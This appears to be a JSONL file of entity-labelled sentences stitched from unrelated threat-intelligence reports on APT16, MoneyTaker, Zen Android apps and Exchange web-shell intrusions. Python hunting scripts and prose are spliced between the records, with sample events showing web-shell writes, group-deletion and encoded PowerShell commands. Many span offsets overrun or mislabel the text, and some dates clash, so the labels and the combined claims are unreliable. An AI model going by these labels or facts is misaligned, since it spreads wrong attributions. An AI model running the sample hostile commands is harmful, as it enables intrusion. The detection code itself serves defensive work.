Between November 26, 2015, and December 1, 2015, known and suspected China based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": [{"start": 32, "end": 35, "label": "Malware"}, {"start": 70, "end": 89, "label": "System"}, {"start": 146, "end": 165, "label": "System"}, {"start": 763, "end": 779, "label": "Vulnerability"}]} {"text": "'' in a variety of ways , such as static analysis , dynamic analysis , and machine learning . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability , and the local Windows privilege escalation vulnerability CVE-2015-1701 . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 224, "end": 228, "label": "Organization"}, {"start": 335, "end": 344, "label": "Organization"}, {"start": 345, "end": 349, "label": "System"}, {"start": 389, "end": 392, "label": "System"}, {"start": 448, "end": 455, "label": "System"}, {"start": 491, "end": 504, "label": "Vulnerability"}, {"start": 545, "end": 553, "label": "Organization"}, {"start": 593, "end": 618, "label": "System"}]} {"text": "While our systems are great at automatically detecting and protecting against PHAs , we believe the best security comes from the combination of automated scanning and skilled human review . 
The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO , or a backdoor that we refer to as ELMER . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": [{"start": 222, "end": 230, "label": "Organization"}, {"start": 320, "end": 324, "label": "Organization"}, {"start": 510, "end": 518, "label": "Malware"}, {"start": 555, "end": 560, "label": "Malware"}, {"start": 632, "end": 670, "label": "Indicator"}, {"start": 734, "end": 749, "label": "System"}]} {"text": "With this blog series we will be sharing our research analysis with the research and broader security community , starting with the PHA family , Zen . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . On November 26, 2015, a suspected China based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": [{"start": 145, "end": 148, "label": "Malware"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 239, "end": 247, "label": "Organization"}, {"start": 254, "end": 258, "label": "Organization"}, {"start": 393, "end": 399, "label": "System"}]} {"text": "Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts . 
In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . As shown in Figure 1, the emails originated from the Yahoo ! email address mts03282000@yahoo.co.jp , and contained the subject \u201c Sending of New Year . While the use of web shells is common amongst threat actors , the parent processes , timing , and victim(s ) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 90, "end": 96, "label": "Organization"}, {"start": 172, "end": 177, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 197, "end": 201, "label": "Organization"}, {"start": 255, "end": 261, "label": "System"}, {"start": 282, "end": 287, "label": "Organization"}, {"start": 290, "end": 295, "label": "System"}, {"start": 304, "end": 327, "label": "Indicator"}, {"start": 512, "end": 581, "label": "Indicator"}]} {"text": "These accounts are created by abusing accessibility services . By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks . Foreword \u201d . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": [{"start": 104, "end": 112, "label": "Organization"}, {"start": 129, "end": 145, "label": "Organization"}, {"start": 217, "end": 221, "label": "Organization"}, {"start": 301, "end": 323, "label": "System"}, {"start": 338, "end": 352, "label": "Organization"}, {"start": 424, "end": 454, "label": "Vulnerability"}]} {"text": "Zen apps gain access to root permissions from a rooting trojan in its infection chain . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools . 
Each phishing message contained the same malicious Microsoft Word attachment . This was likely to establish both persistence and secondary access , as in other environments .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 236, "end": 240, "label": "System"}]} {"text": "In this blog post , we do not differentiate between the rooting component and the component that abuses root : we refer to them interchangeably as Zen . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime . The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website , as both discussed national defense topics and carried the same byline . In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": [{"start": 147, "end": 150, "label": "Malware"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 529, "end": 537, "label": "Organization"}, {"start": 551, "end": 675, "label": "Indicator"}]} {"text": "We also describe apps that we think are coming from the same author or a group of authors . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The lure documents also used the Japanese calendar , as indicated by the 27th year in the Heisei period . The file , matches signatures for the tried - and - true China Chopper .", "spans": [{"start": 386, "end": 422, "label": "Organization"}]} {"text": "All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect . To control the full operation , MoneyTaker uses a Pentest framework Server . 
This demonstrates that the threat actors understand conventional Japanese date notation . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": [{"start": 82, "end": 101, "label": "System"}, {"start": 136, "end": 146, "label": "Organization"}, {"start": 154, "end": 178, "label": "System"}, {"start": 384, "end": 403, "label": "System"}]} {"text": "Background Uncovering PHAs takes a lot of detective work and unraveling the mystery of how they 're possibly connected to other apps takes even more . On it , MoneyTaker install a legitimate tool for penetration testing \u2013 Metasploit . Following the exploitation of the EPS and CVE-2015-1701 vulnerabilities , the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample . If the system is in a single - system domain , it will execute on the local computer .", "spans": [{"start": 159, "end": 169, "label": "Organization"}, {"start": 222, "end": 232, "label": "System"}, {"start": 269, "end": 272, "label": "System"}, {"start": 277, "end": 290, "label": "Vulnerability"}, {"start": 391, "end": 399, "label": "Malware"}]} {"text": "PHA authors usually try to hide their tracks , so attribution is difficult . At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control ( C2 ) server and uniform resource locator ( URL ) path . Per Microsoft \u2019s blog , they have identified additional post - exploitation activities , including : \u2022 Compression of data for exfiltration via 7 - Zip . 
\u2022 Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": [{"start": 202, "end": 217, "label": "Organization"}, {"start": 220, "end": 228, "label": "Malware"}, {"start": 259, "end": 263, "label": "Indicator"}, {"start": 328, "end": 347, "label": "System"}, {"start": 350, "end": 352, "label": "System"}, {"start": 410, "end": 422, "label": "Organization"}]} {"text": "Sometimes , we can attribute different apps to the same author based on a small , unique pieces of evidence that suggest similarity , such as a repetition of an exceptionally rare code snippet , asset , or a particular string in the debug logs . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot . The encoded payload is written to a temporary file , decoded and executed in a hidden window . \u2022 Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": [{"start": 246, "end": 256, "label": "Organization"}, {"start": 264, "end": 272, "label": "System"}]} {"text": "Every once in a while , authors leave behind a trace that allows us to attribute not only similar apps , but also multiple different PHA families to the same group or person . To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify . The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively , where [%rand%] is a 4-byte hexadecimal number based on the current timestamp . 
The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": [{"start": 212, "end": 222, "label": "Organization"}, {"start": 233, "end": 243, "label": "System"}, {"start": 248, "end": 259, "label": "System"}, {"start": 390, "end": 408, "label": "Indicator"}, {"start": 413, "end": 431, "label": "Indicator"}, {"start": 637, "end": 650, "label": "Organization"}, {"start": 655, "end": 736, "label": "Indicator"}]} {"text": "However , the actual timeline of the creation of different variants is unclear . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . IRONHALO : AcroRd32Info.exe.exe a8ccb2fc5fec1b89f778d93096f8dd65 . This activity is followed quickly by additional access and persistent mechanisms .", "spans": [{"start": 335, "end": 343, "label": "Malware"}, {"start": 346, "end": 366, "label": "Indicator"}, {"start": 367, "end": 399, "label": "Indicator"}]} {"text": "In April 2013 , we saw the first sample , which made heavy use of dynamic code loading ( i.e. , fetching executable code from remote sources after the initial app is installed ) . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs . IRONHALO persists by copying itself to the current user \u2019s Startup folder . 
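The IRONHALO artifacts described above (igfxHK[%rand%].dat holding the Base64-encoded download, igfxHK[%rand%].exe holding the decoded payload, a 4-byte hex value derived from the timestamp, and a copy of the downloader in the user's Startup folder) are enough for a filesystem triage routine. The Python below is an added example, not FireEye's detection content; the directory listing is constructed, the AcroRd32Info.exe.exe name is taken from the sample listed on the page, and reading the hex value as Unix seconds is an assumption made for the timestamp hint only.

```python
import base64
import binascii
import ntpath
import re
from datetime import datetime, timezone

# igfxHK + 4-byte hex value + .dat (still Base64-encoded download) or .exe (decoded payload).
IRONHALO_NAME = re.compile(r'igfxhk([0-9a-f]{8})[.](dat|exe)')
# Per-user Startup folder, where the page says IRONHALO copies itself.
STARTUP_MARKER = '/start menu/programs/startup/'

# Constructed listing of (path, file_text_or_None); the .dat holds Base64 of a fake MZ header.
SAMPLE_DAT = base64.b64encode(b'MZ' + bytes(62)).decode('ascii')
SAMPLE_LISTING = [
    ('C:/Users/alice/AppData/Local/Temp/igfxHK56E1A2B0.dat', SAMPLE_DAT),
    ('C:/Users/alice/AppData/Local/Temp/igfxHK56E1A2B0.exe', None),
    ('C:/Users/alice/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/AcroRd32Info.exe.exe', None),
    ('C:/Users/alice/AppData/Local/Temp/igfxHK.dat', None),
    ('C:/Windows/System32/drivers/igfxHK12345678.sys', None),
]


def classify_name(path):
    # (hex_stem, ext) when the file name follows the IRONHALO scheme, else None.
    m = IRONHALO_NAME.fullmatch(ntpath.basename(path).lower())
    return (m.group(1), m.group(2)) if m else None


def looks_like_encoded_pe(text):
    # The .dat is the download before decoding: valid Base64 that yields an MZ header.
    try:
        raw = base64.b64decode(''.join(text.split()), validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw[:2] == b'MZ'


def timestamp_hint(hex8, lo=2009, hi=2030):
    # Triage hint only: the page says the value derives from the current timestamp but not how,
    # so this assumes plain Unix seconds and reports the date when it falls in a plausible window.
    when = datetime.fromtimestamp(int(hex8, 16), tz=timezone.utc)
    return when.isoformat() if lo <= when.year < hi else None


def triage(listing):
    # Pair .dat/.exe by stem, check that the .dat really is an encoded PE, and collect
    # executables dropped in a Startup folder. chr(92) is a backslash, so either separator works.
    pairs, startup = {}, []
    for path, content in listing:
        norm = path.replace(chr(92), '/').lower()
        if STARTUP_MARKER in norm and norm.endswith('.exe'):
            startup.append(path)
        found = classify_name(path)
        if not found:
            continue
        hex8, ext = found
        entry = pairs.setdefault(hex8, {'dat': None, 'exe': None, 'encoded_pe': False,
                                        'time_hint': timestamp_hint(hex8)})
        entry[ext] = path
        if ext == 'dat' and content is not None:
            entry['encoded_pe'] = looks_like_encoded_pe(content)
    return {'pairs': pairs, 'startup_copies': startup}


if __name__ == '__main__':
    result = triage(SAMPLE_LISTING)
    for stem, info in result['pairs'].items():
        print(stem, info)
    print('startup copies:', result['startup_copies'])
```

A stem that appears with both extensions and whose .dat decodes to an MZ header is a much stronger finding than either file alone; the Startup-folder list is reported separately because that location is also used by legitimate software and needs hash or signer checks before it is treated as IRONHALO.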
We recommend checking the following for potential evidence of compromise : \u2022 Child processes of on Exchange Servers , particularly .", "spans": [{"start": 180, "end": 193, "label": "Organization"}, {"start": 264, "end": 282, "label": "System"}, {"start": 287, "end": 313, "label": "System"}, {"start": 361, "end": 369, "label": "Malware"}, {"start": 420, "end": 427, "label": "System"}]} {"text": "Dynamic code loading makes it impossible to state what kind of PHA it was . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string , as shown in Figure 2 . \u2022 New , unexpected compiled ASPX files in the directory \u2022 Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": [{"start": 259, "end": 263, "label": "Indicator"}, {"start": 323, "end": 333, "label": "System"}, {"start": 424, "end": 528, "label": "Indicator"}, {"start": 588, "end": 604, "label": "System"}, {"start": 621, "end": 730, "label": "Indicator"}]} {"text": "This sample displayed ads from various sources . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China . The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads . 
If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": [{"start": 49, "end": 56, "label": "Organization"}, {"start": 133, "end": 149, "label": "Organization"}, {"start": 324, "end": 339, "label": "System"}]} {"text": "More recent variants blend rooting capabilities and click fraud . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . On December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701 . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : \u2022 At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) \u2022", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 347, "end": 350, "label": "System"}, {"start": 369, "end": 382, "label": "Vulnerability"}, {"start": 402, "end": 428, "label": "System"}]} {"text": "As rooting exploits on Android become less prevalent and lucrative , PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . Unlike the Nov. 26 campaign , these attacks targeted Taiwanese governmental and media and entertainment organizations . 
The contents of the Exchange Web Server ( also found within the folder ) \u2022 At least 14 days of Exchange Control Panel ( ECP ) logs , located in We have found significant hunting and analysis value in these log folders , especially for suspicious CMD parameters in the ECP Server logs .", "spans": [{"start": 23, "end": 30, "label": "System"}, {"start": 206, "end": 217, "label": "Organization"}, {"start": 267, "end": 284, "label": "Malware"}, {"start": 365, "end": 371, "label": "System"}, {"start": 514, "end": 533, "label": "System"}, {"start": 589, "end": 624, "label": "System"}, {"start": 762, "end": 777, "label": "System"}]} {"text": "This post does n't follow the chronological evolution of Zen , but instead covers relevant samples from least to most complex . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Moreover , the exploit dropped a different malware payload , a backdoor we refer to as ELMER . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": [{"start": 57, "end": 60, "label": "Malware"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 205, "end": 223, "label": "System"}, {"start": 313, "end": 318, "label": "Malware"}, {"start": 381, "end": 436, "label": "Indicator"}]} {"text": "Apps with a custom-made advertisement SDK The simplest PHA from the author 's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1 . 
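To act on the hunting guidance above (child processes of w3wp.exe and UMWorkerProcess.exe on Exchange servers, new compiled ASPX files, and the net group command that removes the administrator from the Exchange Organization administrators group), the following Python is an added example written for this page, not Mandiant's or Microsoft's tooling. It runs over constructed process-create and file-create events modelled loosely on Sysmon; the pre-tokenized argv lists, the host names and the exact shape of the net group command are assumptions. As the page notes, web shell names differ per intrusion, so nothing below keys on help.aspx or iisstart.aspx.

```python
import ntpath

# Exchange-hosted parents that should not be launching shells or scripting hosts.
EXCHANGE_PARENTS = {'w3wp.exe', 'umworkerprocess.exe'}
SHELL_CHILDREN = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}
# Server-side script extensions a dropped web shell is compiled from.
WEBSHELL_EXT = ('.aspx', '.asp', '.ashx', '.asmx')

# Constructed telemetry, loosely modelled on Sysmon process-create and file-create events.
# Command lines are pre-tokenized into argv lists and paths use forward slashes so the sample
# stays readable; ntpath.basename accepts either separator on real data.
SAMPLE_EVENTS = [
    {'type': 'process', 'host': 'EXCH01', 'parent': 'C:/Windows/System32/inetsrv/w3wp.exe',
     'image': 'C:/Windows/System32/cmd.exe',
     'argv': ['cmd.exe', '/c', 'echo', 'PAYLOAD', '>', 'C:/inetpub/wwwroot/aspnet_client/help.aspx']},
    {'type': 'file', 'host': 'EXCH01', 'parent': None,
     'image': 'C:/Program Files/Microsoft/Exchange Server/V15/Bin/UMWorkerProcess.exe',
     'target': 'C:/inetpub/wwwroot/aspnet_client/iisstart.aspx'},
    {'type': 'process', 'host': 'EXCH01', 'parent': 'C:/Windows/System32/inetsrv/w3wp.exe',
     'image': 'C:/Windows/System32/cmd.exe',
     'argv': ['cmd.exe', '/c', 'net', 'group', 'Exchange Organization administrators',
              'administrator', '/del', '/domain']},
    {'type': 'process', 'host': 'EXCH02', 'parent': 'C:/Windows/System32/inetsrv/w3wp.exe',
     'image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'argv': ['powershell.exe', '-nop', '-w', 'hidden', '-enc', 'aQBlAHgA']},
    # Benign: an interactive shell opened by an administrator, and a routine Exchange log write.
    {'type': 'process', 'host': 'EXCH01', 'parent': 'C:/Windows/explorer.exe',
     'image': 'C:/Windows/System32/cmd.exe', 'argv': ['cmd.exe']},
    {'type': 'file', 'host': 'EXCH01', 'parent': None,
     'image': 'C:/Program Files/Microsoft/Exchange Server/V15/Bin/MSExchangeMailboxAssistants.exe',
     'target': 'C:/Program Files/Microsoft/Exchange Server/V15/Logging/MailboxAssistants/x.log'},
]


def base(path):
    # Lower-case file name of an image or target path, tolerant of either separator style.
    return ntpath.basename(path or '').lower()


def is_net_group_delete(argv):
    # True for net/net1 group <group> <member> /del [...] anywhere in the tokenized command line.
    # The page describes the intent (remove the administrator from the Exchange Organization
    # administrators group, starting at the domain controller); the exact syntax is an assumption.
    toks = [t.lower() for t in argv]
    for i in range(len(toks) - 1):
        if toks[i] in ('net', 'net.exe', 'net1', 'net1.exe') and toks[i + 1] == 'group':
            return '/del' in toks[i + 2:] or '/delete' in toks[i + 2:]
    return False


def hunt(events):
    # Returns (host, reason, detail) tuples. Nothing here keys on the web shell file name,
    # because those differ per intrusion; the parent process and the action are the signal.
    findings = []
    for ev in events:
        parent, image = base(ev.get('parent')), base(ev.get('image'))
        if ev['type'] == 'process' and parent in EXCHANGE_PARENTS and image in SHELL_CHILDREN:
            argv = ev.get('argv', [])
            if is_net_group_delete(argv):
                reason = 'exchange-parent-removed-group-member'
            elif any(t.lower().endswith(WEBSHELL_EXT) for t in argv):
                reason = 'exchange-parent-wrote-webshell'
            else:
                reason = 'exchange-parent-spawned-shell'
            findings.append((ev['host'], reason, parent + ' -> ' + image + ' ' + ' '.join(argv)))
        elif ev['type'] == 'file' and image in EXCHANGE_PARENTS and base(ev.get('target')).endswith(WEBSHELL_EXT):
            findings.append((ev['host'], 'exchange-process-created-webshell', image + ' -> ' + base(ev['target'])))
    return findings


if __name__ == '__main__':
    for host, reason, detail in hunt(SAMPLE_EVENTS):
        print(host, reason, detail)
```

The file rule flags any web-script extension written by an Exchange worker process rather than only files under the IIS root, because the directories involved differ between Exchange versions; tighten it to your own paths once you know them. Every hit should be checked against the HTTP and ECP logs the page recommends preserving, since the request that triggered the write is the fastest way to confirm exploitation and to scope dwell time.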
FireEye detects this activity across our platforms .", "spans": [{"start": 187, "end": 194, "label": "Organization"}, {"start": 218, "end": 229, "label": "System"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 276, "end": 294, "label": "System"}, {"start": 388, "end": 395, "label": "Organization"}]} {"text": "By proxying all requests through a custom server , the real source of ads is opaque . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The attachment was created using the traditional Chinese character set , and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website http://shwoo.gov.taipei/buyer_flowchart.asp . The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": [{"start": 110, "end": 121, "label": "System"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 168, "end": 186, "label": "System"}, {"start": 334, "end": 354, "label": "Organization"}, {"start": 371, "end": 414, "label": "Indicator"}, {"start": 494, "end": 509, "label": "System"}]} {"text": "This example shows one possible implementation of this technique . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks . The second December spear phishing attack targeted Taiwan based news media organizations . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. 
\u2019s critical infrastructure security ( and more ) .", "spans": [{"start": 77, "end": 85, "label": "Organization"}, {"start": 147, "end": 152, "label": "Organization"}, {"start": 182, "end": 198, "label": "Organization"}, {"start": 215, "end": 219, "label": "Organization"}, {"start": 255, "end": 260, "label": "Organization"}, {"start": 370, "end": 390, "label": "Organization"}]} {"text": "This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite . The emails originated from the address dpptccb.dpp@msa.hinet.net , and contained the subject DPP's Contact Information Update . Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys .", "spans": [{"start": 132, "end": 138, "label": "System"}, {"start": 263, "end": 295, "label": "System"}, {"start": 314, "end": 330, "label": "Malware"}, {"start": 389, "end": 395, "label": "System"}, {"start": 424, "end": 449, "label": "Indicator"}, {"start": 513, "end": 539, "label": "Organization"}, {"start": 603, "end": 642, "label": "Organization"}]} {"text": "It may even allow them to sell ad space directly to application developers . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks . 
Based on the email address naming convention and message subject , the threat actors may have tried to make the message appear to be a legitimate communication from the Democratic Progressive Party ( DPP ) , Taiwan \u2019s opposition party . To me , simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non - issue , but the U.S. Appeals Court has put a hold on this rule for the time being ( though it did n\u2019t give a precise reason at the time of its ruling ) .", "spans": [{"start": 87, "end": 95, "label": "Organization"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 192, "end": 208, "label": "Organization"}, {"start": 225, "end": 229, "label": "Organization"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 286, "end": 291, "label": "System"}, {"start": 532, "end": 555, "label": "Organization"}, {"start": 651, "end": 669, "label": "Organization"}]} {"text": "The advertisement SDK also collects statistics about clicks and impressions to make it easier to track revenue . The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data . Unlike the previous exploit documents , this malicious attachment did not contain any visible text when opened in Microsoft Word . Two leading Republican members of the U.S. 
House came out hours after the Biden administration released the roadmap , saying they would use their respective House panels to , \u201c exercise strict oversight on CISA \u2019s efforts \u201d to implement many of the policies outlined .", "spans": [{"start": 117, "end": 135, "label": "System"}, {"start": 279, "end": 297, "label": "Malware"}, {"start": 302, "end": 317, "label": "Malware"}, {"start": 434, "end": 443, "label": "Organization"}, {"start": 444, "end": 448, "label": "System"}, {"start": 489, "end": 499, "label": "Organization"}, {"start": 525, "end": 545, "label": "Organization"}, {"start": 608, "end": 620, "label": "Organization"}]} {"text": "Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . The exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": [{"start": 163, "end": 179, "label": "Malware"}, {"start": 204, "end": 210, "label": "System"}, {"start": 237, "end": 251, "label": "Malware"}, {"start": 452, "end": 457, "label": "Malware"}, {"start": 560, "end": 569, "label": "Organization"}]} {"text": "We have seen two types of apps that use this custom-made SDK . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB . ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi , and is capable of performing file uploads and downloads , file execution , and process and directory listings . 
Say these arguments extend through the 2024 election \u2014 what happens if control of the White House or Congress switches between parties ?", "spans": [{"start": 101, "end": 105, "label": "Organization"}, {"start": 161, "end": 169, "label": "Organization"}, {"start": 172, "end": 177, "label": "Malware"}, {"start": 210, "end": 214, "label": "Indicator"}, {"start": 235, "end": 241, "label": "System"}, {"start": 442, "end": 453, "label": "Organization"}]} {"text": "The first are games of very low quality that mimic the experience of popular mobile games . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . To retrieve commands , ELMER sends HTTP GET requests to a hard-coded C2 server , and parses the HTTP response packets received from the C2 server for an integer string corresponding to the command that needs to be executed . Our researchers recently discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": [{"start": 120, "end": 138, "label": "Malware"}, {"start": 141, "end": 157, "label": "Malware"}, {"start": 185, "end": 197, "label": "Malware"}, {"start": 242, "end": 247, "label": "Malware"}, {"start": 254, "end": 258, "label": "Indicator"}, {"start": 288, "end": 290, "label": "System"}, {"start": 315, "end": 319, "label": "Indicator"}, {"start": 355, "end": 357, "label": "System"}, {"start": 506, "end": 523, "label": "Organization"}, {"start": 532, "end": 551, "label": "Organization"}, {"start": 554, "end": 576, "label": "Organization"}, {"start": 581, "end": 595, "label": "Organization"}]} {"text": "While the counterfeit games claim to provide similar functionality to the popular apps , they are simply used to display ads through a custom advertisement SDK . To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track . 
Table 2 lists the ELMER backdoors observed during the December campaigns . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": [{"start": 192, "end": 202, "label": "Organization"}, {"start": 209, "end": 235, "label": "System"}, {"start": 283, "end": 298, "label": "Malware"}]} {"text": "The second type of apps reveals an evolution in the author 's tactics . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121.127.249.74 over port 443 . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": [{"start": 165, "end": 175, "label": "Malware"}, {"start": 180, "end": 202, "label": "Malware"}, {"start": 209, "end": 214, "label": "Malware"}, {"start": 223, "end": 255, "label": "Indicator"}, {"start": 272, "end": 274, "label": "System"}, {"start": 286, "end": 300, "label": "Indicator"}, {"start": 348, "end": 385, "label": "Malware"}, {"start": 390, "end": 403, "label": "System"}, {"start": 416, "end": 421, "label": "System"}]} {"text": "Instead of implementing very basic gameplay , the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information . APT16 . 
If you \u2019re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": [{"start": 170, "end": 180, "label": "System"}, {"start": 359, "end": 364, "label": "Organization"}, {"start": 438, "end": 452, "label": "Organization"}, {"start": 456, "end": 472, "label": "Organization"}, {"start": 510, "end": 523, "label": "Organization"}]} {"text": "The only noticeable difference is the game has more ads , including ads on the very first screen . Over the years they've used application components from Norman , McAfee and Norton . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China based APT group that we refer to as APT16 . For those who fall outside of that demographic , it \u2019s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": [{"start": 155, "end": 161, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 175, "end": 181, "label": "Organization"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 517, "end": 526, "label": "System"}]} {"text": "In all cases , the ads are used to convince users to install other apps from different developer accounts , but written by the same group . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims . This is based on the use of the known APT16 domain rinpocheinfo.com , as well as overlaps in previously observed targeting and tactics , techniques and procedures ( TTPs ) . 
